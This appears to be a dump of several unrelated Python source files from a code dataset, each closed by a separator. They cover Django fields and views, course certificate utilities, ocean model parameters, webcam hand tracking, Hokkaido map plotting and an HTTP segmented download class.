colors = _colors.values()
from random import randint
for i in range(n):
yield Color(colors[randint(0,len(colors)-1)])
@classmethod
def _hue2rgb(cls, p, q, t):
if t < 0:
t += 1;
if t > 1:
t -= 1;
if t < 1/6.0:
return p + (q - p) * 6 * t;
if t < 1/2.0:
return q;
if t < 2/3.0:
return p + (q - p) * (2/3.0 - t) * 6;
return p;
| StarcoderdataPython |
1648189 | <gh_stars>1-10
from django.db import models
from django.utils.translation import gettext_lazy as _
from .types import OTHER_VALUE, Detector, Filter, Method
class MethodBooleanField(models.BooleanField):
method: Method
def __init__(self, method: Method):
self.method = method
super().__init__(
verbose_name=method,
help_text=_("{} analysis technique").format(method),
default=False,
)
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
del kwargs["verbose_name"]
del kwargs["help_text"]
del kwargs["default"]
args = [self.method, *args]
return name, path, args, kwargs
class DetectorFieldMixin:
method: Method
detector: Detector
def __init__(
self: models.Field, method: Method, detector: Detector, *args, **kwargs
):
self.method = method
self.detector = detector
super().__init__( # type: ignore
verbose_name=_("other detector") if detector == OTHER_VALUE else detector,
help_text=_("{} / {} detector").format(
method,
detector,
),
*args,
**kwargs
)
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
del kwargs["verbose_name"]
del kwargs["help_text"]
args = [self.method, self.detector, *args]
return name, path, args, kwargs
class DetectorBooleanField(DetectorFieldMixin, models.BooleanField):
def __init__(self, *args, **kwargs):
super().__init__(*args, default=False)
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
del kwargs["default"]
return name, path, args, kwargs
class DetectorCharField(DetectorFieldMixin, models.CharField):
def __init__(self, *args, **kwargs):
super().__init__(*args, max_length=45, default="", blank=True)
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
del kwargs["max_length"]
del kwargs["default"]
del kwargs["blank"]
return name, path, args, kwargs
class FiltersCharField(models.CharField):
"""CharField without explicit choices
Choice management is done by the Form.
"""
method: Method
detector: Detector
filters: list[Filter]
def __init__(
self, method: Method, detector: Detector, filters: list[Filter], *args, **kwargs
):
if not filters:
raise Exception("FilterCharField requires some filters")
self.method = method
self.detector = detector
self.filters = filters
super().__init__( # type: ignore
verbose_name=_("{} filters").format(detector),
help_text=_("{} / {} filters choice").format(method, detector),
max_length=45,
default="",
blank=True,
)
def deconstruct(self):
name, path, args, kwargs = super().deconstruct()
args = [self.method, self.detector, self.filters, *args]
del kwargs["verbose_name"]
del kwargs["help_text"]
del kwargs["max_length"]
del kwargs["default"]
del kwargs["blank"]
return name, path, args, kwargs
| StarcoderdataPython |
1618637 | <reponame>MalikJordan/pyPOM1D
# params_pombfm
h = 150.0 # Depth [m]
# dti = 100.0 # timestep [s]
dti = 3600.
alat = 45.0 # latitude [degrees]
idiagn = 1 # switch between prognostic (idiagn = 0) and diagnostic (idiagn = 1) mode
idays = 3600 # length of run [days]
# idays = 366
smoth = 0.1 # parameter for hasselin filter
ihotst = 0 # switch for cold start (ihotst = 0) and hot start, ie reading restart (ihotst = 1)
kl1 = 2 # surface logarithmic layers distribution
kl2 = 150 # bottom logarithmic layers distribution
savef = 1 # output averaging and saving frequency [days]
nrt_o2o = 0.06 # relaxation velocity for oxygen [m/d]
nrt_n1p = 0.06 # relaxation velocity for phosphate [m/d]
nrt_n3n = 0.06 # relaxation velocity for nitrate [m/d]
nrt_n4n = 0.05 # relaxation velocity for ammonium [m/d]
nbct = 2 # flag for temperature boundary conditions
nbcs = 1 # flag for salinity boundary conditions
nbcbfm = 1 # flag for bfm boundary conditions
umol = 1e-06 # background diffusion
umolt = 1e-07 # background diffusion for temperature
umols = 1.3e-07 # background diffusion for salalinity
umolbfm = 0.0001 # background diffusion for bfm
ntp = 2 # flag for jerlov water type ( 1 = I, 2 = IA, 3 = IB, 4 = II, 5 = III)
trt = 0 # relaxation time for lateral temperature advection
srt = 1 # relaxation time for lateral salinity advection
upperh = 5.0 # depth where lateral advection starts
ssrt = 5.68 # relaxation time for surface salinity flux
| StarcoderdataPython |
1793710 | <gh_stars>0
import cv2
import mediapipe as mp
# FOR CHECKING THE FRAME RATE
import time
# CREATE A VIDEOCAPTURE OBJECT
cap = cv2.VideoCapture(0);
# TO DETECT HAND
mpHands = mp.solutions.hands
# WE HAVE CREATED A MEDIAPIPE 'HANDS' OBJECT, THUS DETECTING HAND WITH HELP OF THE 21 GIVEN POINTS)
# PARAMS :-
# static_image_mode = false means DETECTION + TRACKING (if tracking confidence is above some threshold)
# SINCE DEFAULT PARAMS USED, WE HAVE NOT PASSED ANYTHING TO Hands
hands = mpHands.Hands();
mpDraw = mp.solutions.drawing_utils
# NOW WE WILL CHECK FRAME RATE SO FOR THAT WE WILL DEFINE PTIME , CTIME
ptime = 0
ctime = 0
if not cap.isOpened():
print("Camera is not started yet")
while True:
# CAPTURE IMAGE FRAME BY FRAME
# RETURNS BOOL AND FRAME , TRUE IF FRAME IS READ CORRECTLY IN BGR FORMAT
success,img = cap.read();
# CONVERT IMAGE TO RGB
imgRGB = cv2.cvtColor(img,cv2.COLOR_BGR2RGB);
# THIS METHOD PERFORMS HAND LANDMARK ESTIMATION AND THIS METHOD EXPECTS RGB FORMAT IMAGE
results = hands.process(imgRGB)
# IF WE WANT TO GET THE LANDMARK OF OUR HANDS
print(results.multi_hand_landmarks);
# CHECK IF MULTIPLE HANDS ARE THERE ,AND IF YES, EXTRACT THEM
if results.multi_hand_landmarks:
for handlms in results.multi_hand_landmarks:
# HERE WE ARE LOCATING THE 21(0-20) POINTS OF OUR HAND WITH X AND Y COORDINATES FOR EACH HAND FRAME
for id, lm in enumerate(handlms.landmark):
# print(id,lm)
# we are taking height, width and channel
h, w, c= img.shape
# Convert the different parameters into pixels
cx , cy = int(lm.x* w), int(lm.y* h)
# identify id with locations in pixels
#print(id, cx, cy)
# now we will draw a circle for id 0
if id==8:
cv2.circle(img, (cx , cy), 20, (255,0,255), cv2.FILLED)
# now we will draw a circle for id 4
if id ==12:
cv2.circle(img, (cx, cy), 20, (255, 255, 0), cv2.FILLED)
# FOR DRAWING LANDMARKS (HAND_CONNECTIONS HELP TO JOIN THE 21 POINTS TO THE RESPECTIVE POINTS)
mpDraw.draw_landmarks(img,handlms,mpHands.HAND_CONNECTIONS);
ctime = time.time()
fps= 1/(ctime-ptime)
ptime = ctime
# HERE WE ARE DISPLAYING THE FPS ALONG WITH THE VIDEO
cv2.putText(img, str(int(fps)), (10,70), cv2.FONT_HERSHEY_PLAIN,3,(255,0,255),3)
# TO DISPLAY THE FRAME
cv2.imshow("Hand Detector WebCam",img);
if not success:
break;
# IF USER PRESS Q THEN WE HAVE TO QUIT
if cv2.waitKey(1) & 0xFF==ord("q"):
break;
# When Everything Done Release the capture
cap.release()
# Destroy All the windows
cv2.destroyAllWindows() | StarcoderdataPython |
1754819 | """
Utilities for courses/certificates
"""
import logging
from requests.exceptions import HTTPError
from rest_framework.status import HTTP_404_NOT_FOUND
from django.conf import settings
from django.db import transaction
from courses.constants import PROGRAM_TEXT_ID_PREFIX
from courses.models import (
CourseRunGrade,
CourseRunCertificate,
ProgramCertificate,
Program,
CourseRun,
ProgramEnrollment,
)
from mitxpro.utils import has_equal_properties
from courseware.api import get_edx_api_course_detail_client
log = logging.getLogger(__name__)
def ensure_course_run_grade(user, course_run, edx_grade, should_update=False):
"""
Ensure that the local grades repository has the grade for the User/CourseRun combination supplied.
Args:
user (user.models.User): The user for whom the grade is being synced
course_run (courses.models.CourseRun): The course run for which the grade is created
edx_grade (edx_api.grades.models.UserCurrentGrade): The OpenEdx grade object
should_update (bool): Update the local grade record if it exists
Returns:
(courses.models.CourseRunGrade, bool, bool) that depicts the CourseRunGrade, created and updated values
"""
grade_properties = {
"grade": edx_grade.percent,
"passed": edx_grade.passed,
"letter_grade": edx_grade.letter_grade,
}
updated = False
if should_update:
with transaction.atomic():
run_grade, created = CourseRunGrade.objects.select_for_update().get_or_create(
course_run=course_run, user=user, defaults=grade_properties
)
if (
not created
and not run_grade.set_by_admin
and not has_equal_properties(run_grade, grade_properties)
):
# Perform actual update now.
run_grade.grade = edx_grade.percent
run_grade.passed = edx_grade.passed
run_grade.letter_grade = edx_grade.letter_grade
run_grade.save_and_log(None)
updated = True
else:
run_grade, created = CourseRunGrade.objects.get_or_create(
course_run=course_run, user=user, defaults=grade_properties
)
return run_grade, created, updated
def process_course_run_grade_certificate(course_run_grade):
"""
Ensure that the couse run certificate is in line with the values in the course run grade
Args:
course_run_grade (courses.models.CourseRunGrade): The course run grade for which to generate/delete the certificate
Returns:
(courses.models.CourseRunCertificate, bool, bool) that depicts the CourseRunCertificate, created, deleted values
"""
user = course_run_grade.user
course_run = course_run_grade.course_run
# A grade of 0.0 indicates that the certificate should be deleted
should_delete = not bool(course_run_grade.grade)
should_create = course_run_grade.passed
if should_delete:
delete_count, _ = CourseRunCertificate.objects.filter(
user=user, course_run=course_run
).delete()
return None, False, (delete_count > 0)
elif should_create:
certificate, created = CourseRunCertificate.objects.get_or_create(
user=user, course_run=course_run
)
return certificate, created, False
return None, False, False
def generate_program_certificate(user, program):
"""
Create a program certificate if the user has a course certificate
for each course in the program. Also, It will create the
program enrollment if it does not exist for the user.
Args:
user (User): a Django user.
program (programs.models.Program): program where the user is enrolled.
Returns:
(ProgramCertificate or None, bool): A tuple containing a
ProgramCertificate (or None if one was not found or created) paired
with a boolean indicating whether the certificate was newly created.
"""
existing_cert_queryset = ProgramCertificate.objects.filter(
user=user, program=program
)
if existing_cert_queryset.exists():
ProgramEnrollment.objects.get_or_create(
program=program, user=user, defaults={"active": True, "change_status": None}
)
return existing_cert_queryset.first(), False
courses_in_program_ids = set(program.courses.values_list("id", flat=True))
num_courses_with_cert = (
CourseRunCertificate.objects.filter(
user=user, course_run__course_id__in=courses_in_program_ids
)
.distinct()
.count()
)
if len(courses_in_program_ids) > num_courses_with_cert:
return None, False
program_cert = ProgramCertificate.objects.create(user=user, program=program)
if program_cert:
log.info(
"Program certificate for [%s] in program [%s] is created.",
user.username,
program.title,
)
_, created = ProgramEnrollment.objects.get_or_create(
program=program, user=user, defaults={"active": True, "change_status": None}
)
if created:
log.info(
"Program enrollment for [%s] in program [%s] is created.",
user.username,
program.title,
)
return program_cert, True
def revoke_program_certificate(
user, readable_id, revoke_state, include_program_courses
):
"""
Revoked a program certificate.
Args:
user (User): a Django user.
readable_id: represents the program (readable_id) for revoking a ProgramCertificate.
revoke_state: (bool) override the is_revoked state of ProgramCertificate.
include_program_courses: (bool) Indicate to revoke/un-revoke all course runs that are associated with a program.
"""
program = Program.objects.get(readable_id=readable_id)
try:
program_certificate = ProgramCertificate.all_objects.get(
user=user, program__readable_id=readable_id
)
except ProgramCertificate.DoesNotExist:
log.warning(
"Program certificate for user: %s in program %s does not exist.",
user.username,
readable_id,
)
return False
program_certificate.is_revoked = revoke_state
program_certificate.save()
if include_program_courses:
courses_in_program_ids = set(program.courses.values_list("id", flat=True))
CourseRunCertificate.all_objects.filter(
user=user, course_run__course_id__in=courses_in_program_ids
).update(is_revoked=revoke_state)
log.info(
"Course certificates associated with that program: [%s] are also updated",
program,
)
return True
def revoke_course_run_certificate(user, courseware_id, revoke_state):
"""
Revoked a course run certificate.
Args:
user (User): a Django user.
courseware_id: represents the course run.
revoke_state: represents the course run (courseware_id) for revoking a CourseRunCertificate.
"""
course_run = CourseRun.objects.get(courseware_id=courseware_id)
try:
course_run_certificate = CourseRunCertificate.all_objects.get(
user=user, course_run=course_run
)
except CourseRunCertificate.DoesNotExist:
log.warning(
"Course run certificate for user: %s and course_run: %s does not exist.",
user.username,
course_run,
)
return False
course_run_certificate.is_revoked = revoke_state
course_run_certificate.save()
return True
def sync_course_runs(runs):
"""
Sync course run dates and title from Open edX
Args:
runs ([CourseRun]): list of CourseRun objects.
Returns:
[str], [str]: Lists of success and error logs respectively
"""
api_client = get_edx_api_course_detail_client()
success_count = 0
failure_count = 0
# Iterate all eligible runs and sync if possible
for run in runs:
try:
course_detail = api_client.get_detail(
course_id=run.courseware_id,
username=settings.OPENEDX_SERVICE_WORKER_USERNAME,
)
except HTTPError as e:
failure_count += 1
if e.response.status_code == HTTP_404_NOT_FOUND:
log.error(
"Course not found on edX for readable id: %s", run.courseware_id
)
else:
log.error("%s: %s", str(e), run.courseware_id)
except Exception as e: # pylint: disable=broad-except
failure_count += 1
log.error("%s: %s", str(e), run.courseware_id)
else:
# Reset the expiration_date so it is calculated automatically and
# does not raise a validation error now that the start or end date
# has changed.
if (
run.start_date != course_detail.start
or run.end_date != course_detail.end
):
run.expiration_date = None
run.title = course_detail.name
run.start_date = course_detail.start
run.end_date = course_detail.end
run.enrollment_start = course_detail.enrollment_start
run.enrollment_end = course_detail.enrollment_end
try:
run.save()
success_count += 1
log.info("Updated course run: %s", run.courseware_id)
except Exception as e: # pylint: disable=broad-except
# Report any validation or otherwise model errors
log.error("%s: %s", str(e), run.courseware_id)
failure_count += 1
return success_count, failure_count
def is_program_text_id(item_text_id):
"""
Analyzes a text id for some enrollable item and returns True if it's a program id
Args:
item_text_id (str): The text id for some enrollable item (program/course run)
Returns:
bool: True if the given id is a program id
"""
return item_text_id.startswith(PROGRAM_TEXT_ID_PREFIX)
| StarcoderdataPython |
3320752 | from rest_framework import generics, permissions, authentication
from . import serializers
from . import models
from core.permissions import IsAdmin
class GetAllCategoriesView(generics.ListAPIView):
serializer_class = serializers.MainCategoryListSerializer
queryset = models.MainCategory.objects.all().order_by('id')
class CreateMainCategoryView(generics.CreateAPIView):
permission_classes = (permissions.IsAdminUser,)
authentication_classes = (authentication.TokenAuthentication,)
serializer_class = serializers.MainCategorySerializer
class MainCategoryListView(generics.ListAPIView):
queryset = models.MainCategory.objects.all()
serializer_class = serializers.MainCategorySerializer
class ManageMainCategoryView(generics.RetrieveUpdateDestroyAPIView):
queryset = models.MainCategory.objects.all()
authentication_classes = (authentication.TokenAuthentication,)
permission_classes = (permissions.IsAdminUser,)
serializer_class = serializers.MainCategorySerializer
class CreateCategoryView(generics.CreateAPIView):
serializer_class = serializers.CategorySerializer
permission_classes = (IsAdmin,)
authentication_classes = (authentication.TokenAuthentication,)
class CategoryListView(generics.ListAPIView):
queryset = models.Category.objects.all()
permission_classes = (permissions.IsAdminUser,)
authentication_classes = (authentication.TokenAuthentication,)
serializer_class = serializers.CategoryNestedSerializer
class MangeCategoryView(generics.RetrieveUpdateDestroyAPIView):
queryset = models.Category.objects.all()
serializer_class = serializers.CategorySerializer
permission_classes = (IsAdmin,)
authentication_classes = (authentication.TokenAuthentication,)
class CreateSubCategoryView(generics.CreateAPIView):
serializer_class = serializers.SubCategorySerializer
permission_classes = (IsAdmin,)
authentication_classes = (authentication.TokenAuthentication,)
class SubCategoryListView(generics.ListAPIView):
queryset = models.SubCategory.objects.all()
serializer_class = serializers.SubCategoryReadSerializer
authentication_classes = (authentication.TokenAuthentication,)
permission_classes = (permissions.IsAdminUser,)
class MangeSubCategoryView(generics.RetrieveUpdateDestroyAPIView):
queryset = models.SubCategory.objects.all()
serializer_class = serializers.SubCategorySerializer
permission_classes = (IsAdmin,)
authentication_classes = (authentication.TokenAuthentication,)
| StarcoderdataPython |
3343392 | #!/usr/bin/python3
# coding: utf-8
# This source code is based on japanmap: https://github.com/SaitoTsutomu/japanmap
import codecs
from cv2 import imread, cvtColor, COLOR_BGR2RGB
import json
#import matplotlib.pyplot as plt
#import matplotlib.dates as dates
#import matplotlib.cm as cm
import numpy as np
import pandas as pd
import plotly
import plotly.express as px
import plotly.tools as tls
import plotly.graph_objects as go
import plotly.io as pio
import plotly.offline as offline
from plotly.subplots import make_subplots
import sys
if "ipy" in sys.argv[0]:
offline.init_notebook_mode()
from svglib.svglib import svg2rlg
from reportlab.graphics import renderPM
from pathlib import Path
from cov19utils import show_and_save_plotly
FONT_NAME = 'MS Gothic'
# 振興局情報
sub_prefs = {
# (2020年7月31日 住民基本台帳)
0: dict(name="非公表" , code="00", suffix="その他", total=9999999),
1: dict(name="石狩" , code="01", suffix="振興局" , total=2385306),
2: dict(name="渡島" , code="02", suffix="総合振興局", total= 385954),
3: dict(name="檜山" , code="03", suffix="振興局" , total= 34589),
4: dict(name="後志" , code="04", suffix="総合振興局", total= 202399),
5: dict(name="空知" , code="05", suffix="総合振興局", total= 284613),
6: dict(name="上川" , code="06", suffix="総合振興局", total= 486430),
7: dict(name="留萌" , code="07", suffix="振興局" , total= 44066),
8: dict(name="宗谷" , code="08", suffix="総合振興局", total= 62000),
9: dict(name="オホーツク", code="09", suffix="総合振興局", total= 274757),
10:dict(name="胆振" , code="10", suffix="総合振興局", total= 384448),
11:dict(name="日高" , code="11", suffix="振興局" , total= 64725),
12:dict(name="十勝" , code="12", suffix="総合振興局", total= 335432),
13:dict(name="釧路" , code="13", suffix="総合振興局", total= 225158),
14:dict(name="根室" , code="14", suffix="振興局" , total= 73102)
}
# 振興局内の市町村
city_towns = {
0: "非公表 中国".split(),
1: "札幌市 江別市 千歳市 恵庭市 北広島市 石狩市 当別町 新篠津村".split(),
2: "函館市 松前町 福島町 知内町 木古内町 北斗市 七飯町 鹿部町 森町 八雲町 長万部町".split(),
3: "江差町 上ノ国町 厚沢部町 乙部町 せたな町 今金町 奥尻町".split(),
4: "小樽市 島牧村 寿都町 黒松内町 蘭越町 ニセコ町 真狩村 留寿都村 喜茂別町 京極町 倶知安町 共和町 岩内町 泊村 神恵内村 積丹町 古平町 仁木町 余市町 赤井川村".split(),
5: "夕張市 岩見沢市 美唄市 芦別市 赤平市 三笠市 滝川市 砂川市 歌志内市 深川市 南幌町 奈井江町 上砂川町 由仁町 長沼町 栗山町 月形町 浦臼町 新十津川町 妹背牛町 秩父別町 雨竜町 北竜町 沼田町 幌加内町".split(),
6: "旭川市 士別市 名寄市 富良野市 鷹栖町 東神楽町 当麻町 比布町 愛別町 上川町 東川町 美瑛町 和寒町 剣淵町 下川町 上富良野町 中富良野町 南富良野町 占冠村 美深町 音威子府村 中川町".split(),
7: "留萌市 増毛町 小平町 苫前町 羽幌町 初山別村 遠別町 天塩町 幌延町".split(),
8: "稚内市 猿払村 浜頓別町 中頓別町 枝幸町 豊富町 礼文町 利尻町 利尻富士町".split(),
9: "北見市 網走市 紋別市 大空町 美幌町 津別町 斜里町 清里町 小清水町 訓子府町 置戸町 佐呂間町 遠軽町 湧別町 滝上町 興部町 西興部村 雄武町".split(),
10:"室蘭市 苫小牧市 登別市 伊達市 豊浦町 洞爺湖町 壮瞥町 白老町 安平町 厚真町 むかわ町".split(),
11:"日高町 平取町 新冠町 新ひだか町 浦河町 様似町 えりも町".split(),
12:"帯広市 新得町 清水町 幕別町 池田町 豊頃町 本別町 音更町 士幌町 上士幌町 鹿追町 芽室町 中札内村 更別村 大樹町 広尾町 足寄町 陸別町 浦幌町".split(),
13:"釧路市 釧路町 厚岸町 浜中町 標茶町 弟子屈町 鶴居村 白糠町".split(),
14:"根室市 別海町 中標津町 標津町 羅臼町 色丹村 泊村 留夜別村 留別村 紗那村 蘂取村".split(), # 後志の泊村と重複する
}
def get_sub_code(name):
""" 振興局コードを取得する """
for k, v in sub_prefs.items():
if v['name'] != "" and name.startswith(v['name']):
return k
for k, v in city_towns.items():
if len(v) > 0 and name in v:
return k
return 0
def get_svg_txt(dic=None, rate=1):
""" SVG のテキストを取得する """
f = codecs.open(str(Path(__file__).parent / "Subprefectures_of_Hokkaido.svg"), encoding="utf-8")
p = f.read()
if hasattr(dic, "items"):
for k, v in dic.items():
i = k if isinstance(k, int) else int(k.lstrp("0"))
if 0 <= i <= 14:
p = p.replace("#c%02d" % (k), v)
return p
def get_hokkaido(dic=None, ret=1):
""" 塗り分け済み Hokkaido の nparray 画像情報を取得する """
txt = get_svg_txt(dic, ret)
filename = str(Path(__file__).parent / "svglib.tmp")
f = codecs.open(filename, "w", encoding="utf-8")
f.write(txt)
f.close()
#print(txt)
drawing = svg2rlg(filename)
pngname = filename.replace(".tmp", ".jpg")
renderPM.drawToFile(drawing, pngname, 'JPEG')
x = imread(pngname)
img = cvtColor(x, COLOR_BGR2RGB)
return img
##def make_hokkaido_heatmap(filename, title, npa1d):
## """ 北海道のヒートマップを作成する """
## plt.close()
## plt.style.use("dark_background")
## #plt.subplots_adjust(left=0.07, right=0.99, bottom=0.07, top=0.95)
## plt.title(title, fontname=FONT_NAME)
## plt.rcParams['figure.figsize'] = 8, 8
## cmap = plt.get_cmap("rainbow")
## norm = plt.Normalize(vmin=np.min(npa1d), vmax=np.max(npa1d))
## fcol = lambda x: '#' + bytes(cmap(norm(x), bytes=True)[:3]).hex()
## plt.colorbar(cm.ScalarMappable(norm, cmap))
## map_cols = {}
## for k, v in sub_prefs.items():
## map_cols[k] = fcol(npa1d[k])
## #print(map_cols)
## pict = get_hokkaido(map_cols)
## plt.imshow(pict)
## plt.savefig(filename)
def make_hokkaido_plotly(filename, title, npa1d):
""" 北海道のヒートマップを作成する """
fig = go.Figure()
w=600
h=528
cmap = plt.get_cmap("plasma")
norm = plt.Normalize(vmin=np.min(npa1d), vmax=np.max(npa1d))
fcol = lambda x: '#' + bytes(cmap(norm(x), bytes=True)[:3]).hex()
map_cols = {}
for k, v in sub_prefs.items():
map_cols[k] = fcol(npa1d[k])
pict = get_hokkaido(map_cols)
fig.add_trace(go.Scatter(x=[0, w], y=[0, h], mode='markers', marker_opacity=0))
fig.add_trace(go.Heatmap(x=[0, 0], y=[0, 0], opacity=0,
z=[np.min(npa1d[1:]), np.max(npa1d[1:])],
zmin=np.min(npa1d[1:]), zmax=np.max(npa1d[1:]),
type='heatmap', colorscale='plasma', showscale=True))
map_cols = {}
axis_template = lambda x: dict(
range=[0, x], autorange=False, showgrid=False, zeroline=False,
linecolor='black', showticklabels=False, ticks='')
fig.update_layout(title=title, xaxis=axis_template(w), yaxis=axis_template(h),
showlegend=False, width=w, height=h, autosize=False,
margin={"l": 0, "r": 0, "t":40, "b": 0}
)
fig.add_layout_image(dict(
x=0, sizex=w, y=h, sizey=h, xref="x", yref="y", opacity=1,
layer="below", sizing="stretch", source=Image.fromarray(pict)))
show_and_save_plotly(fig, filename, js=False, show=True, image=True, html=False)
def make_hokkaido_choropleth(filename, title, npa1d, show=True):
""" 北海道の choropleth を作成する """
f = codecs.open("hokkaido-min.geojson", "r", encoding='utf-8')
geojson = json.load(f)
f.close()
df = pd.read_csv('hokkaido.txt', header=0, index_col=0,
dtype={'code':str, 'total':int, 'subcode':str, 'color':float})
i = 0
for c in npa1d:
df.loc[i, 'color'] = c
i += 1
fig = px.choropleth(df, geojson=geojson, color="color", hover_name='name',
locations="subcode", featureidkey="properties.code",
hover_data=['total'],
labels={'color':'値', 'subcode':'自治体コード', 'total':'人口'},
projection="mercator", title=title)
fig.update_geos(visible=False,
lonaxis=dict(range=[139.772386, 145.792893]),
lataxis=dict(range=[41.383390, 45.531737]))
fig.update_layout(margin={"r":0,"t":40,"l":0,"b":0})
show_and_save_plotly(fig, filename, js=False, show=show, image=True, html=True)
def test_picture():
""" テスト """
f = get_hokkaido({
1:"#0000ff",
2:"#ff0000",
3:"#00ff00",
4:"#ff00ff",
5:"#00ffff",
6:"#ffff00",
7:"#ffffff",
8:"#cccccc",
9:"#000080",
10:"#008000",
11:"#800000",
12:"#000000",
13:"#800080",
14:"#808000"
})
import matplotlib.pyplot as plt
plt.imshow(f)
plt.savefig("hoge.jpg")
if __name__ == "__main__":
for k, v in sub_prefs.items():
print("no:{} name:{} code:{} total:{} ".format(k, v['name'], v['code'], v['total']))
for k, v in city_towns.items():
print("k:{} v:{}".format(k, v))
names = ["函館市", "旭川市", "白糠町", "小樽市", "空知", "日高", "日高振興局管内", "札幌市", "非公表", "中国"]
for n in names:
print("{} = {}".format(n, get_sub_code(n)))
test_picture()
| StarcoderdataPython |
3300847 | <gh_stars>100-1000
# ***************************************************************************************
# Title: LabAdvComp/parcel
# Author: <NAME>
# Date: May 26, 2016
# Code version: 0.1.13
# Availability: https://github.com/LabAdvComp/parcel
# ***************************************************************************************
from gdc_client.parcel import utils
from gdc_client.parcel import const
from gdc_client.parcel.defaults import max_timeout, deprecation_header
import logging
from intervaltree import Interval
import os
import requests
import time
from urllib.parse import urlparse
class DownloadStream(object):
http_chunk_size = const.HTTP_CHUNK_SIZE
check_segment_md5sums = True
def __init__(self, url, directory, token=None):
self.initialized = False
self.is_regular_file = True
self.log = logging.getLogger(str(url))
self.name = None
self.directory = self._get_directory_name(directory, url)
self.size = None
self.md5sum = None
self.token = token
self.url = url
self.check_file_md5sum = True
def init(self):
self.get_information()
self.print_download_information()
self.initialized = True
return self
def _get_directory_name(self, directory, url):
# get filename/id
path = urlparse(url).path
if "," not in path:
folder = os.path.basename(path)
else:
# path name is a multi-id dl
folder = time.strftime("parcel-%Y%m%d-%H%M%S")
return os.path.join(directory, folder)
def _parse_filename(self, filename):
"""Given an attachment filename, which sometimes is an S3 Key, strip
quotation marks and return a "basename" as a filename
:param str: filename or S3 key
:returns: proper filename
"""
name = filename.strip('"').strip("'")
return os.path.basename(name)
def setup_file(self):
self.setup_directories()
try:
utils.set_file_length(self.temp_path, self.size)
except:
self.log.warning(
utils.STRIP(
"""Unable to set file length. File appears to
be a {0} file, attempting to proceed.
""".format(
utils.get_file_type(self.path)
)
)
)
self.is_regular_file = False
def setup_directories(self):
if not os.path.exists(self.directory):
os.makedirs(self.directory)
if not os.path.exists(self.state_directory):
os.makedirs(self.state_directory)
@property
def path(self):
"""Function to standardize the output path for a download.
:returns: A string specifying the full download path
"""
return os.path.join(self.directory, self.name)
@property
def temp_path(self):
"""Function to standardize the temp path for a download.
:returns: A string specifying the full temp path
"""
return os.path.join(self.directory, "{0}.partial".format(self.name))
@property
def state_path(self):
"""Function to standardize the state path for a download.
:returns: A string specifying the download state path
"""
return os.path.join(self.state_directory, "{0}.parcel".format(self.name))
@property
def state_directory(self):
"""Function to standardize the state directory for a download.
:returns: A string specifying the download state directory
"""
return os.path.join(self.directory, "logs")
def header(self, start=None, end=None):
"""Return a standard header for any parcel HTTP request. If ``start``
and ``end`` are specified, then the header will contain a Range
request.
:param int start: optional. The beginning of the range interval
:param int end: optional.
The end of the range interval. This value is inclusive.
If give range A-B, then both bytes A and B will be
included.
:returns: A dictionary header containing the token
"""
header = {
"X-Auth-Token": self.token,
}
if start is not None and end is not None:
header["Range"] = "bytes={0}-{1}".format(start, end)
# provide host because it's mandatory, range request
# may not work otherwise
scheme, host, path, params, q, frag = urlparse(self.url)
header["host"] = host
return header
def request(self, headers=None, verify=True, close=False, max_retries=16):
"""Make request for file and return the response.
:param str file_id: The id of the entity being requested.
:param dict headers: Request headers. see :func:`construct_header()`.
:param bool verify: Verify SSL hostname
:param bool close:
Automatically close the connection. Set to true if you just
the response header.
:returns: A `requests` response.
"""
self.log.debug("Request to {0}".format(self.url))
# Set urllib3 retries and mount for session
a = requests.adapters.HTTPAdapter(max_retries=max_retries)
s = requests.Session()
s.mount(urlparse(self.url).scheme, a)
headers = self.headers() if headers is None else headers
try:
r = s.get(
self.url,
headers=headers,
verify=verify,
stream=True,
timeout=max_timeout,
)
except Exception as e:
raise RuntimeError(
(
"Unable to connect to API: ({0}). Is this url correct: '{1}'? "
"Is there a connection to the API? Is the server running?"
).format(str(e), self.url)
)
try:
r.raise_for_status()
except Exception as e:
raise RuntimeError("{0}: {1}".format(str(e), r.text))
if close:
r.close()
return r
def get_information(self):
"""Make a request to the data server for information on the file.
:param str file_id: The id of the entity being requested.
:returns: Tuple containing the name and size of the entity
"""
headers = self.header()
r = self.request(headers, close=True)
self.log.debug("Request responded")
content_length = r.headers.get("Content-Length")
if not content_length:
self.log.debug("Missing content length.")
# it also won't come with an md5sum
self.check_file_md5sum = False
else:
self.size = int(content_length)
self.log.debug("{0} bytes".format(self.size))
attachment = r.headers.get("content-disposition", None)
self.log.debug("Attachment: : {}".format(attachment))
# Some of the filenames are set to be equal to an S3 key, which can
# contain '/' characters and it breaks saving the file
self.name = (
self._parse_filename(attachment.split("filename=")[-1])
if attachment
else "untitled"
)
self.md5sum = None
if self.check_file_md5sum:
self.md5sum = r.headers.get("content-md5", "")
return self.name, self.size
def write_segment(self, segment, q_complete, retries=5):
"""Read data from the data server and write it to a file.
:param str file_id: The id of the file
:params str path: A string specifying the full download path
:params tuple segment:
A tuple containing the interval to download (start, end)
:params q_out: A multiprocessing Queue used for async reporting
:returns: The total number of bytes written
"""
written = 0
# Create header that specifies range and make initial stream
# request. Note the 1 subtracted from the end of the interval
# is because the HTTP range request is inclusive of the top of
# the interval.
start, end = segment.begin, segment.end - 1
assert end >= start, "Invalid segment range."
try:
# Initialize segment request
r = self.request(self.header(start, end))
# Iterate over the data stream
self.log.debug("Initializing segment: {0}-{1}".format(start, end))
for chunk in r.iter_content(chunk_size=self.http_chunk_size):
if not chunk:
continue # Empty are keep-alives.
offset = start + written
# Write the chunk to disk, create an interval that
# represents the chunk, get md5 info if necessary, and
# report completion back to the producer
utils.write_offset(self.temp_path, chunk, offset)
if self.check_segment_md5sums:
iv_data = {"md5sum": utils.md5sum(chunk)}
else:
iv_data = None
complete_segment = Interval(offset, offset + len(chunk), iv_data)
q_complete.put(complete_segment)
written += len(chunk)
except KeyboardInterrupt:
return self.log.error("Process stopped by user.")
# Retry on exception if we haven't exceeded max retries
except Exception as e:
# TODO FIXME HACK create new segment to avoid duplicate downloads
segment = Interval(segment.begin + written, segment.end, None)
self.log.debug("Unable to download part of file: {0}\n.".format(str(e)))
if retries > 0:
self.log.debug("Retrying download of this segment")
return self.write_segment(segment, q_complete, retries - 1)
else:
self.log.error("Max retries exceeded.")
return 0
# Check that the data is not truncated or elongated
if written != segment.end - segment.begin:
# TODO FIXME HACK create new segment to avoid duplicate downloads
segment = Interval(segment.begin + written, segment.end, None)
self.log.debug(
